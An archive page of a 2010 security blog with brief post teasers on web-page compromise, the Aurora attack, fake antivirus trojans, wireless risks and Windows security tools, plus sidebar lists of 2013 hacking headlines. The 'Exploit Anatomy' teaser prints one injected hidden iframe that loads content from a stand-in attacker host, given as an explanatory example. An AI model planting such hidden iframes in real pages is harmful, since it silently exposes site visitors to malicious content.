April 2010

Exploit Anatomy

Submitted by Cyberwarz1 on Wed, 04/07/2010 - 13:13

Here is a typical example of a compromised web page. Due to a bug in a web application like phpBB2, Moveable Type or many others, the adversary was able to insert the following line of HTML into your home page:
 


<iframe src="http://www.somehost.com/ment/" width="0" height="0"></iframe>

 

Virtual Private Network

Submitted by siavash on Sun, 04/04/2010 - 17:07

With a virtual private network, you can connect network components through another network, such as the Internet. You can make your Windows Server 2003-based computer a remote-access server so that other users can connect to it by using VPN, and then they can log on to the network and access shared resources. VPNs do this by "tunneling" through the Internet or through another public network in a manner that provides the same security and features as a private network.

Tags: 

Hydraq Aurora Google Attacks

Submitted by siavash on Sun, 04/04/2010 - 11:44

Advanced Persistent Threat Hydraq
Is a targeted attack that is also currently referred to as Aurora, Google Attacks, and the Microsoft IE Vulnerability. Through the exploitation of a vulnerability, it attempts to install a trojan on a specific computer that steals information from that machine. The trojan attempts to make contact with command and control servers in order to receive instructions and to upload any information that it may have collected. This type of attack is often called an advanced persistent threat because of the sophistication and persistence of the attack within a business.This attack is of concern to all computer users because vulnerabilities used in this attack are now widely known and likely to be exploited by other cybercriminals.
 

Tags: 

Trojan Fake Anti Virus

Submitted by siavash on Sun, 04/04/2010 - 11:10

Trojan Fake AV is a detection for Trojan horse programs that intentionally misrepresent the security status of a computer. These programs attempt to convince the user to purchase software in order to remove non-existent malware or security risks from the computer. The user is continually prompted to pay for the software using a credit card.
Some programs employ tactics designed to annoy or disrupt the activities of the user until the software is purchased.

 

Tags: 

Wireless Threats

Submitted by siavash on Sat, 04/03/2010 - 13:57

In recent years, wireless networking has become more available, affordable, and easy to use. Home users are adopting wireless technology in great numbers.
On-the-go laptop users often find free wireless connections in places like coffee shops and airports.If you’re using wireless technology, or considering making the move to wireless, you should know about the security threats you may encounter.


Home Wireless Threats

 By now, you should be aware of the need to secure traditional, wired internet connections. If you’re planning to move to a wireless connection in your home,
take a moment to consider what you’re doing: You’re connecting a device to your DSL or
cable modem that broadcasts your internet connection through the air over a radio signal to your computers. if traditional wired connections are prey to security problems, think of the security problems that arise when you open your internet connection to the airwaves.
 

Tags: 

IPv6 Internet Connection Firewall Configuration

Submitted by siavash on Sat, 04/03/2010 - 11:42

Netsh is a command-line scripting tool that allows you to display or modify the network configuration of a computer running Windows XP. Netsh supports various networking components through a context, a series of commands that is specific to the component.
To configure the IPv6 Internet Connection Firewall (ICF) provided with the Advanced Networking Pack for Windows XP, you must use commands in the netsh firewall context,

Tags: 

HackerScan

Submitted by siavash on Sat, 04/03/2010 - 11:04

This script parses all the IIS-related log files (IIS log files, HTTPError log files, UrlScan log files) looking for "suspicious'" URL's that might have been sent to compromise the server. The "HackerScan.txt" file contains a sample of the patterns to search for in URL's.
 

 

Requirements

 

  • Windows Log Parser

 

 

Supported Platforms

 

  • Windows Server 2003

 

Tags: 

BitLocker

Submitted by siavash on Fri, 04/02/2010 - 23:24

The BitLocker Repair Tool (Repair-bde) is a command-line tool included with Windows7 and Windows Server 2008 R2. This tool can be used to access encrypted data on a severely damaged hard disk if the drive was encrypted by using BitLocker Drive Encryption.Repair-bde can reconstruct critical parts of the drive and salvage recoverable data as long as a valid recovery password or recovery key is used to decrypt the data.

Tags: 

Windows-Remote-Management

Submitted by siavash on Fri, 04/02/2010 - 21:33

Windows Remote Management is one component of the Windows Hardware Management features that manage server hardware locally and remotely.
These features include a service that implements the WS-Management protocol,
hardware diagnosis and control through baseboard management controllers (BMCs),
and a COM API and scripting objects that allow you to write applications that communicate remotely through the WS-Management protocol.

 

Components of WinRM and Hardware Management

Tags: 

Online Banking Target By Pharming&Phishing Attacks

Submitted by siavash on Thu, 04/01/2010 - 21:22

Attacks that Target Online Banking

Online banking continues to present challenges to your financial security and personal privacy.Millions of people have had their checking accounts compromised, mainly as a result of onlinebanking. If you are going to use online banking to conduct financial transactions, you shouldmake yourself aware of the risks and take precautions to minimize them.Several types of electronic fraud specifically target online banking.
 

Tags: 

Pages

Anonymous

South Africa Police Service Hacked
Post date: 05/22/2013 - 09:23
Anonymous hackers shut down Rome court's website
Post date: 05/21/2013 - 12:09
#opisrael reloaded - We know who you are!
Post date: 05/21/2013 - 11:58
Anonymous Hacktivists pinched in Vatican Operation Tango Down
Post date: 05/17/2013 - 16:24
#Anonymous #opPetrol will hit petroleum industry on the 20th of June 2013
Post date: 05/11/2013 - 12:44

Hacking

Phishing attacks Target Moore Tornado Tragedy
Post date: 05/24/2013 - 18:50
Twitter two-factor authentication
Post date: 05/23/2013 - 08:16
South Africa Police Service Hacked
Post date: 05/22/2013 - 09:23
Chinese Hackers Army Marching On U.S. companies, government Network
Post date: 05/20/2013 - 13:17
Yahoo Japan suspects 22m IDs stolen
Post date: 05/18/2013 - 11:38

Infosec

How the U.S. Government Hacks the World
Post date: 05/25/2013 - 11:15
Syrian Electronic Army Hacked British ITV Twitter
Post date: 05/25/2013 - 01:16
Phishing attacks Target Moore Tornado Tragedy
Post date: 05/24/2013 - 18:50
New Apple QuickTime Update Patches 12 Vulnerabilities
Post date: 05/24/2013 - 11:23
NYPD detective accused of hiring email hackers
Post date: 05/23/2013 - 23:36

Cyberwarfare

U.S. Could Use Cyberattack on Syrian Air Defenses
Post date: 05/19/2013 - 20:39
Microsoft Security Intelligence Report 14 released
Post date: 05/13/2013 - 14:11
Israel sets up 'secret' diplomatic mission in Persian Gulf
Post date: 05/13/2013 - 13:45
Watch Dogs Game targets SCADA systems & shows cyberwarfare
Post date: 05/13/2013 - 13:32
DOD confirms China’s cyberwar strategy
Post date: 05/12/2013 - 23:16